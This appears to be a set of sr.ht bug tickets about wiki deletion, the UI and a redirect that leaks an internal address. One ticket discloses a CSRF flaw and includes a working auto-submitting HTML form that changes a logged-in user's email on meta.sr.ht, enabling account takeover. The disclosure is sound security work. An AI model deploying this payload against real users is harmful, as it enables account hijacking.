If I create a wiki and delete the underlying repo I cannot delete the wiki anymore. The workaround for now was to go and create that repo again and then delete the wiki.
If I create a new wiki, but don't push an index.md it isn't very clear from the UI how I would be able to delete the wiki. I found that I can go to https://man.sr.ht/manage/~username/fakewiki/info to find the delete button. Can the UI be improved to show this?
This is a minor issue since it doesn't break anything in most cases. When there are redirects, the URL in the body is incorrect and instead shows the internal IP address/port.
HTTP/1.1 302 FOUND Server: nginx/1.14.0 Date: Fri, 16 Nov 2018 19:29:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 281 Location: https://man.sr.ht/dispatch.sr.ht/ Connection: close Set-Cookie: history="[\"man.sr.ht\"\054 \"meta.sr.ht\"\054 \"builds.sr.ht\"\054 \"git.sr.ht\"\054 \"todo.sr.ht\"\054 \"lists.sr.ht\"\054 \"dispatch.sr.ht\"]"; Domain=.sr.ht; Path=/ X-GNU: Terry Pratchett <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>Redirecting...</title> <h1>Redirecting...</h1> <p>You should be redirected automatically to target URL: <a href="http://127.0.0.1:5004/dispatch.sr.ht/">http://127.0.0.1:5004/dispatch.sr.ht/</a>. If not click the link.
Sorry about that. Feel free to remove this ticket then.
The website is vulnerable to cross-site request forgery (CSRF). Attackers can host the following HTML to force a user into changing their email address to an attacker's email address.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://meta.sr.ht/profile" method="POST"> <input type="hidden" name="email" value="email@example.com" /> <input type="hidden" name="url" value="" /> <input type="hidden" name="location" value="" /> <input type="hidden" name="bio" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
Once a user that is logged in visits the page, a POST request is made to modify their email address. The attacker then receives a confirmation email and can now perform a password reset. The request above is just an example, but will apply to any state changing request.
Feel free to ping me if you have any other questions.